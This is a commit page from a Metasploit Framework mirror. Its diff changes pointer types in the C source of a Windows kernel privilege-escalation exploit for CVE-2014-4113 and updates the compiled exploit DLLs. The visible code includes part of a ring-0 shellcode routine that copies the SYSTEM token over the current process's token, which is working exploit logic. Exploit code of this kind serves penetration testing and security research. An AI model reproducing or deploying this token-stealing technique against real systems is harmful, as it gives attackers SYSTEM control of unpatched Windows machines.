infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use PDWORD_PTR and DWORD_PTR

bug/bundler_fix
jvazquez-r7 2014-10-31 17:35:50 -05:00
parent 6154b7d55f
commit f43a6e9be0
3 changed files with 5 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
View File

Binary file not shown.

19
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored
View File

@ -24,15 +24,6 @@ typedef NTSTATUS *PNTSTATUS;
#define PTR_SIZE sizeof(UINT_PTR)
#ifdef _M_X64
typedef DWORD64 MYWORD;
typedef PDWORD64 PMYWORD;
#else
typedef DWORD MYWORD;
typedef PDWORD PMYWORD;
#endif
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID *BaseAddress,
@ -146,9 +137,9 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
// Search the specified data structure for a member with CurrentValue.
BOOL find_and_replace_member(PMYWORD pdwStructure, MYWORD dwCurrentValue, MYWORD dwNewValue, MYWORD dwMaxSize)
BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
{
MYWORD dwIndex, dwMask;
DWORD_PTR dwIndex, dwMask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
@ -189,9 +180,9 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
systemToken = pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
find_and_replace_member((PMYWORD)pMyProcessInfo,
(MYWORD)targetToken,
(MYWORD)systemToken,
find_and_replace_member((PDWORD_PTR)pMyProcessInfo,
(DWORD_PTR)targetToken,
(DWORD_PTR)systemToken,
0x200);
return 0;
}